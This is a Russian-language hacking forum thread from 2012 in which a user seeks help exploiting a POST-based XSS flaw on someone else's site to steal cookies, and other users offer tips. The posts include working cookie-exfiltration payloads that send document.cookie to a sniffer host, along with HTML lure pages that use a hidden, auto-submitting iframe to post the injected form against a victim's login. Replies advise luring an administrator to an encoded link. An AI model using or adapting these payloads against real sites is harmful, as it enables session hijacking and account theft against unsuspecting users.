XSS POST на почтавике ?

Discussion in 'Песочница' started by LABERT, 28 Jan 2012.

  1. LABERT

    LABERT New Member

    Joined:
    28 Jan 2012
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Недавно я нашел xss POST пассивку уязвимость на неком сайте site.com. Мною был создан сайт на бесплатном хостинге, где была размещена моя html страница, с framom, который открывает нашу страницу site.com/index.html, вводит скрипт в нашу форму "POST" и подтверждает её. В результате frame выводит его на http://evilhost.ru/user/login_form?login=xxx
    В фрейме выполняется код по нашей форме "POST" и его перекидывает на бесплатный сниффер
    <script>document.location.href="http://sniff/s.php?"+document.cookie;</script>'> Вот код на странице моего сайта:

    <html>
    <body>
    <iframe src="http://сайт с ХСС/user/login_form" id="iframe"></iframe>
    <form id="form">
    <input type="text" id="log" name="Login" value="dechwulx"/>
    <input type="password" id="pass" name="password" value="ssbedfsdf">
    <input type="hidden" id="pag" name="page" value=""><script>alert(document.cookie)</script>">
    <input type="submit"/>
    </form>
    <script>
    window.onload = function(){
    var win = document.getElementById("iframe").contentWindow;
    document.getElementById("form").onsubmit = function(e){
    win.postMessage( document.getElementById("log").value );
    win.postMessage( document.getElementById("pass").value );
    win.postMessage( document.getElementById("pag").value );
    e.preventDefault();
    };
    };
    </script>
    </body
    </html>
    Если я в брузере ОПЕРА набираю свой сайт-приманку , он должен показать мне cookie c http://сайт с ХСС/user/login_form , выскакивает окошко :siteowner=1 и все .Получается cookie при загрузке iframe не передаются .Если отправляю iframe на сниффер то приходит:QUERY:siteowner=1, REFERER: http://мой_Сайт/form.html ,AGENT:Opera/9.80 (Windows.. и все.
    ПОЧЕМУ в СКРИПТ script>alert(document.cookie)</script> cookie не передаются ? Help...
     
  2. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    нихуя ты закатил речь, проще обьясни что ты зделал?
     
  3. NZT

    NZT New Member

    Joined:
    31 Dec 2011
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    Я сам новичок в этом но с xss разобрался.
    В этой статье все написано. Проще зделай как я : зарегся на online xss snifer тут , там есть уже готовый скрипт который ты должен подставлять после "=" в уязвимом сайте , и всю эту длиную ссылку (мне кажется лучше ее закодировать) даешь пользователю или админу чтобы он по ней прошел и тебе там в лог придут куки. Удачи.
     
  4. LABERT

    LABERT New Member

    Joined:
    28 Jan 2012
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Так я и пользуюсь бесплатным online snifer , я же писал. Проблема
    найти ошибку в моем post-запросе лежащем на моем сайте (см. выше). Ссылка типа: http://сайт сХСС/user/form?Login=akxhijfa&page=<script src=http://сайт приманка/file.js></script> - ЭТО GET запрос , а уменя POST XSS....КАК сделать ссылку
    ,чтобы при нажатии на нее подгружалась заранее заполненная нами форма и чтобы она автоматом перебрасывала куки на snifer?
     
  5. LABERT

    LABERT New Member

    Joined:
    28 Jan 2012
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Неужели такого рода уязвимость можно применить только в сочетании с CSRF ? Ну где же Вы спецы ?
     
  6. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Можно и POST юзнуть. Но только тебе придется заманить жертву на свой сайт, а потом уже со своего сайта редиректить на сайт жертвы.
     
  7. LABERT

    LABERT New Member

    Joined:
    28 Jan 2012
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Цель именно такая , я заманиваю жертву ,подкидывая ему ссылку на свой сайт и с помощью этого кода ,c скрытым iframe:
    <html>
    <head><title>Ferst;</title></head>
    <body>
    <script type="text/javascript">
    function submit_form(){
    window.evilframe.document.forms[0].submit();
    }
    </script>

    <iframe name="evilframe" src="http://мой_сайт.com/forma.html" style="display:none" onload="submit_form()"></iframe>
    </body>
    </html>

    он отправляется на заранее сформированную мною форму,которая сабмитит на сайт жертвы (уязвимый сайт с ХСС):
    <html>
    <head><title>FORMA </title></head>
    <form method="post" name="comment" action="http://сайт жертвы /login" >
    <input type="text" id="log" name="Login" value="dechwulx"/>
    <input type="password" id="pass" name="password" value="ssbedfsdf">
    <input type="hidden" id="pag" name="page" value=""><script>img = new Image(); img.src = "http://сниффер"+document.cookie;</script>"> //куки отправляются на сниффер
    <input type = "submit">
    </form>

    </body>
    </html>

    По идей куки должны приити ,но приходит только USER_AGENT,REFERER,IP,дата ,работу снифера проверял - работает,получается при переходе на мой сайт и отправке формы, в cookie ничего нет(просто пусто)... CSRF-защита или я что-то делаю не так?